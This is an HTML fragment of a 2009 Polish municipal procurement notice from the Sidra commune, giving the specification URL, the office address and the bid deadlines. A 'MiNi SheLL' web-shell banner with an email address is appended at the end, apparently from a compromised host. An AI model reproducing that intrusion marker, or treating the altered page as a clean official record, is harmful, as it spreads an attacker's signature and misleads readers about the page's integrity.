<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://epodlasie.wipb.pl/biptest/ug_sidra.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Sidra
16-124 Sidra
ul.Rynek 5.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.03.2009 godzina 10:00, miejsce: Urząd Gminy Sidra
16-124 Sidra
ul.Rynek 5
pokój Nr 1.</p><p><b>IV.3.5) Termin związania ofertą:</b> do 09.04.2009.</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com